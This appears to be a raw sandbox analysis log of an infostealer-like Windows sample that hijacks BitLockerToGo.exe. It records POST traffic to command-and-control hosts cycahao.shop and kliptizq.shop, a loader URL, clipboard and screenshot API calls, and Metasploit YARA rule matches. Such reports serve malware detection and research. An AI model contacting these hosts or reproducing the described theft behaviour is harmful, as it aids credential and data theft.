            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TL14N08CP6A2HRYRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19950Host: cycahao.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DKXQRO7HMLDRBQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1203Host: cycahao.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JEIFV1BFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 557861Host: cycahao.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: cycahao.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: cycahao.shop
            Source: global trafficDNS traffic detected: DNS query: kliptizq.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cycahao.shop
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: BitLockerToGo.exe, 00000005.00000003.2484806953.0000000004E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: BitLockerToGo.exe, 00000005.00000003.2484806953.0000000004E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
            Source: BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycahao.shop/
            Source: BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycahao.shop/6
            Source: BitLockerToGo.exe, 00000005.00000003.2591167208.0000000004E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cycahao.shop/api
            Source: BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycahao.shop/apiVr
            Source: BitLockerToGo.exe, 00000005.00000003.2459772417.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cycahao.shop/apibMMCEY
            Source: BitLockerToGo.exe, 00000005.00000003.2459772417.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cycahao.shop/apivVa
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: BitLockerToGo.exe, 00000005.00000003.2484806953.0000000004E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: BitLockerToGo.exe, 00000005.00000003.2591711975.0000000000745000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2592310542.0000000000745000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2592834954.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/
            Source: BitLockerToGo.exe, 00000005.00000003.2591711975.0000000000745000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2592310542.0000000000745000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2592834954.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
            Source: BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt9:
            Source: BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtz1
            Source: BitLockerToGo.exe, 00000005.00000003.2484501874.0000000005135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: BitLockerToGo.exe, 00000005.00000003.2484501874.0000000005135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: BitLockerToGo.exe, 00000005.00000003.2484425080.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
            Source: BitLockerToGo.exe, 00000005.00000003.2484425080.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: BitLockerToGo.exe, 00000005.00000003.2484501874.0000000005135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
            Source: BitLockerToGo.exe, 00000005.00000003.2484501874.0000000005135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
            Source: BitLockerToGo.exe, 00000005.00000003.2484501874.0000000005135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: BitLockerToGo.exe, 00000005.00000003.2484806953.0000000004E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49791 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49801 version: TLS 1.2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00481190 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_00481190
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00481190 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_00481190
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004817B8 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,5_2_004817B8

            System Summary

            barindex
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: 00000000.00000002.2391539251.0000000009F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047B8245_2_0047B824
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004658905_2_00465890
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004869505_2_00486950
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048DA405_2_0048DA40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046CA005_2_0046CA00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0045DA135_2_0045DA13
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004732A05_2_004732A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048E3C05_2_0048E3C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004623E05_2_004623E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004875005_2_00487500
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00475E005_2_00475E00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004716205_2_00471620
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0045AEC05_2_0045AEC0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004897E05_2_004897E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046F7905_2_0046F790
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048E0405_2_0048E040
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004620585_2_00462058
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004618765_2_00461876
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004698045_2_00469804
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048C8205_2_0048C820
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047C82E5_2_0047C82E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047C8C95_2_0047C8C9
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004590D05_2_004590D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004650DD5_2_004650DD
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046E0E05_2_0046E0E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004760F05_2_004760F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048408D5_2_0048408D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046A0A05_2_0046A0A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004790BA5_2_004790BA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0045A9505_2_0045A950
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004739605_2_00473960
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004861605_2_00486160
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004671755_2_00467175
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004559705_2_00455970
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047B81F5_2_0047B81F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004539305_2_00453930
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048C9305_2_0048C930
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047C93D5_2_0047C93D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004787165_2_00478716
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004721F05_2_004721F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004781FB5_2_004781FB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046D1905_2_0046D190
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004582505_2_00458250
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004562605_2_00456260
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048C2715_2_0048C271
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046DA005_2_0046DA00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00484A235_2_00484A23
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0045D2C35_2_0045D2C3
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004542E05_2_004542E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004872905_2_00487290
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00487B605_2_00487B60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048CB205_2_0048CB20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00467BC35_2_00467BC3
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048CBC05_2_0048CBC0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004753D05_2_004753D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00479BF05_2_00479BF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048538D5_2_0048538D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00468C465_2_00468C46
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00489C405_2_00489C40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00466C765_2_00466C76
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00473C005_2_00473C00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00454C105_2_00454C10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00476C355_2_00476C35
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004574D05_2_004574D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046DCD05_2_0046DCD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047B4EE5_2_0047B4EE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046C4925_2_0046C492
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0045EC905_2_0045EC90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004594905_2_00459490
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046849D5_2_0046849D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047CCB95_2_0047CCB9
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046E5005_2_0046E500
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048DD005_2_0048DD00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046B5105_2_0046B510
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00480D105_2_00480D10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00487D295_2_00487D29
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00464DAF5_2_00464DAF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047F6405_2_0047F640
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0047760D5_2_0047760D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004666285_2_00466628
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00473E325_2_00473E32
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00455EC05_2_00455EC0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00465EEF5_2_00465EEF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004566F05_2_004566F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00489EF05_2_00489EF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00480F405_2_00480F40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004647525_2_00464752
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0046E7705_2_0046E770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00452F005_2_00452F00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00485F005_2_00485F00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004787165_2_00478716
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004757305_2_00475730
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004687C15_2_004687C1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_004767EF5_2_004767EF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00476F8F5_2_00476F8F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00464730 appears 71 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00458060 appears 37 times
            Source: 6wFwugeLNG.exe, 00000000.00000000.2139501872.0000000001570000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs 6wFwugeLNG.exe
            Source: 6wFwugeLNG.exe, 00000000.00000002.2391891785.000000000A100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 6wFwugeLNG.exe
            Source: 6wFwugeLNG.exeBinary or memory string: OriginalFileName vs 6wFwugeLNG.exe
            Source: 6wFwugeLNG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon /v version
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: 00000000.00000002.2391539251.0000000009F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: C:\Windows\SysWOW64\reg.exeKey value queried: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon versionJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/0@2/1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00486950 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,5_2_00486950
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
            Source: 6wFwugeLNG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
